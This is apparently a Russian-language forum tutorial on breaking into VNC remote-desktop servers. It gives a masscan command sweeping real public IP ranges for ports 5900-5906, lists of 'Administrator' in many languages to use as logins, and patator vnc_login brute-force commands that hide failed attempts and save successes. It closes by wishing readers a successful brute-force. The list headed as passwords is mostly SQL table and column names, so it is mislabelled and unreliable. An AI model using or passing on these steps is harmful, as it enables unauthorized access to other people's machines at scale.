Для начала нам нужна сама кали, можете поставить её на виртуалку, ВДС или на свой комп.
https://www.kali.org/downloads/
по умолчанию логин root пасс toor
Запускаем терминал, пишем команду.
masscan -p5900-5906 147.177.0.0-147.179.255.255 --rate 10000
masscan - вызов самого сканера
-p - Порты для сканирования 5900-5906 обычно внц по умолчанию.
далее пишем диапазон или диапазоны ip
--rate колво потоков, поговаривают что масскан на очень мощной тачке может просканировать весь интернет с рейтом 10000 за 6 мин)))
Скан завершил свою рабуту, тут Вы можете видеть что я указал уже другие диапазоны через ,
Забираем насканенное. приводим в норм формат 148.66.225.158:5904 сохраняем в txt
Если кто то подскажет софт, или напишет, для приведения в норм вид гудов скана, не один я буду благодарен!
А также рядом кладём txt с логинами и паролями.
Логин "Administrator" на различных языках:
1.Японский(Japanise)
運営者
支配人
2.Немецкий(Germany)
Verwalter
Verwaltungsbeamte
3.Итальянский(italian)
addetto
responsabile
4.Польский(Polish)
administrater
glowny
zarządca
rządca
organizator
opiekun
5.Арабский(Arabic)
مصف
المدير المنتدب
6.Датский(Ducth)
bestuurder
bewindvoerder
7.Китайский(Chinese)
署長
管理人
管理員
經紀
行政官員
8.Эстонский(Estonian)
haldur
juhtija
juhataja
9.Украинский(Ukrainian)
адміністратор
завідатель
опікун
управитель
управляючий
10.Вьетнамский(Vietnamese)
Quản trị viên
11.Албанский(Albanian) - Не тот что язык падонкав !
drejtues
12.Болгарский
управител
администратор
ръководител
управител на имот
13.Испанский
administrador
14.Голландский
administrateur
bestuurder
beheerder
bewindvoerder
15.Чешский
Správce
16.Французский
administrateur
directeur
17.Финский
administraterii
administrateri
administrateree
18.Бразилия (Brazil)
operador
administrador
19.Россия
Администратор
Админ
20.Литовский
Administratorius
21.Мальта
Amministratur
22.Португалия
Administrador
23.Словакия
Správca
24.Турция
Yönetici
25Франция
Administrateur
26.Чехия
Správce
27.Швеция
Administratör
Логин "Administrator" на различных языках
Немного пасов:
about
access
account
accounts
admin
admin_id
admin_name
admin_pass
admin_passwd
admin_password
admin_psw
admin_pwd
admin_user
admin_userid
admin_username
adminemail
adminid
Administrateur
Administrator
administrator_name
administrators
adminlogin
adminmail
adminname
adminpass
adminpassword
adminpaw
adminpsw
adminpwd
admins
AdminUID
adminupass
adminuser
adminuserid
adminusername
adress
aid
Aide
aim
apwd
ArticleID
auid
blog
cc_number
cc_owner
cfg
cid
city
client
clientname
clientpassword
clients
clientusername
conf
config
content
converge_pass_hash
converge_pass_salt
crack
customer
customers
customers_password
data
db_hostname
db_password
db_username
dw
E-mail
e_mail
email
emailaddress
feed
feedback
gid
glmm
group
hash
id
id_member
images
index
isadmin
key
keywords
last_login
lastname
log
login
login_admin
login_name
login_pass
login_passwd
login_password
login_pw
login_pwd
login_user
login_username
logini
loginkey
logins
logo
mail
md5hash
mem_login
mem_pass
mem_passwd
mem_password
mem_pwd
member
member_id
member_login_key
member_name
memberid
membername
members
memlogin
mempassword
mima
mm
mpassword
msn
musername
my_email
my_name
my_password
my_username
myname
mypassword
myusername
name
nc
new
news
newsid
note
number
Numer
nummer
p
p_assword
p_word
pass
pass1word
pass_hash
pass_w
pass_word
passer
Passw
passwd
password
Passwort
passwrd
pe_aduser
pe_user
phone
POWER
psw
pswd
pw
pwd
pwd1
pword
pwrd
qq
sb_admin_name
sb_pwd
search
sesskey
setting
sid
spacer
status
Stocker
store
sysuser
telephone
temp_pass
temp_password
temppass
temppasword
text
texte
title
u
u_name
uid
un
uname
url
user
user1
user_admin
user_email
user_id
user_ip
user_level
user_login
user_n
user_name
user_pass
user_passw
user_passwd
user_password
user_pw
user_pwd
user_pword
user_pwrd
user_uname
user_username
user_usernm
user_usernun
user_usrnm
useradmin
userid
userip
Userlogin
usern
username
usernm
userpass
userpasswd
userPassword
userpw
userpwd
users
usr
usr2
usr_n
usr_name
usr_nusr
usr_pass
usr_pw
usrn
usrnam
usrname
usrnm
usrpass
usrs
website
wind
wp_users
xar_name
xar_pass
yh
yhm
yhmm
yonghu
a_admin
ACT_INFO
ad
adm
admin_login
admin_userinfo
administrator
Art
article
Autor
BBS
book
chat
Client
clubconfig
cms_admin
cms_admins
cms_user
cms_users
company
Contact
contenu
control
controle
Country
dbadmins
download
Event
gl
gly
guanli
guanliyuan
h_admin
Index
info
logon
logs
m_admin
main
manage
manager
mb_users
memberlist
movie
mybb_users
mysql
mysql.user
names
order
passwords
phpmyadmin.pma_table_info
pma_table_info
power
powers
pwds
reg_user
reg_users
reguser
regusers
root
roots
session
settings
site_login
site_logins
SITELOGIN
sitelogins
Subjects
Superuser
sys
sysadmin
sysadmins
sysconstraints
syssegments
System
systime
sysusers
table
tables
tb_admin
tb_administrator
tb_login
tb_member
tb_members
tb_user
tb_username
tbl
tbl_user
tbl_users
tbladmins
tblConfigs
tblUser
test
Titel
u_n
u_p
u_pass
user_info
user_list
UserControl
userinfo
usernames
userpassword
vb_user
vip
WebAdmin
webadmins
Webmaster
webmasters
webuser
webusers
x_admin
Приступаем к самому бруту.
./patator.py vnc_login host=FILE2 user=FILE1 password=FILE0 0=pass.txt 2=host.txt 1=logins.txt
Ну тут я думаю все понятно... при такой нумерации FILE 2-1-0 к каждому хосту сначала первый пароль и первый логин, потом первый пароль к второму логину и так далее.
Аккуратнее манипулируйте нумерацией FILE... что бы не получилось что на один хост сначала будет пытаться проверить все пароли.
Я пользуюсь такой командой:
./patator.py vnc_login host=FILE2 user=FILE1 password=FILE0 0=pass.txt 2=host.txt 1=logins.txt -x ignore:code=1 -l out=234.txt
-x ignore:code=1 - что бы не показывало когда пароль не подходит.
-l out=234 - сохранение результатов, создает папку, в которой результаты брута сохраняються в трех форматах.
Так же когда вы запустили уже брут при нажатии Enter покажет состояние и скорость брута.
Всем удачного брута!!